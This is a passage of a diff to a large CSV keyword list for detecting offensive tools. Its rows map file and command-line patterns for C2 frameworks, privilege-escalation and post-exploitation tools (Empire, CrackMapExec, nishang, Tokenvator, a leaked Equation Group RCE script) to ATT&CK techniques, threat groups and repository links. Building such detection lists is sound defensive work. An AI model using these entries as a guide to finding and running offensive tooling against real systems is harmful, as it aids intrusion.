Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*Empire Framework GUI*","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 
","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" -"*empire --rest *","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1156","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*empire --rest *","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - 
T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1156","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*empire --server *","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "*Empire.Agent.Coms.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Empire.Agent.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" 
@@ -9825,81 +9974,81 @@ "*empire/server/*.py*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*empire/server/downloads/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - 
T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*empire/server/downloads/logs/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" 
-"*empire_exec.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*empire_exec.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*empire_server.*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" 
"*empireadmin*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*empire-chain.pem*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - 
T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*EmpireCORSMiddleware*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*Empire-GUI.git*","offensive_tool_keyword","empire","The Empire 
Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","10","10","471","145","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" -"*Empire-master*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Empire-master*","offensive_tool_keyword","empire","Empire scripts 
functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*empire-priv.key*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - 
T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" -"*EmpireProject*","offensive_tool_keyword","empire","Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent. and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side. Empire implements the ability to run PowerShell agents without needing powershell.exe. rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz. and adaptable communications to evade network detection. all wrapped up in a usability-focused framework. 
PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.","T1027 - T1059 - T1071 - T1070 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*EmpireProject*","offensive_tool_keyword","empire","Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent. and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side. Empire implements the ability to run PowerShell agents without needing powershell.exe. rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz. and adaptable communications to evade network detection. all wrapped up in a usability-focused framework. 
PowerShell Empire premiered at BSidesLV in 2015 and Python EmPyre premeiered at HackMiami 2016.","T1027 - T1059 - T1071 - T1070 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Empire-Sponsors.git*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*empire-test-kalirolling*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - 
T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" "*emptybowl.py*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","1","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" "*enable_persistence.py*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*Enable_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" -"*EnableAllParentPrivileges.c*","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*EnableAllParentPrivileges.exe*","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2669","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" -"*Enabled_Users1.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Enable-DuplicateToken*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*EnableAllParentPrivileges.c*","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*EnableAllParentPrivileges.exe*","offensive_tool_keyword","PSBits","Simple tool enabling all privileges in the parent process (usually cmd.exe) token. Useful if you have SeBackup or SeRestore and need a cmd.exe ignoring all ACLs","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/EnableAllParentPrivileges","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*Enabled_Users1.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Enable-DuplicateToken*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
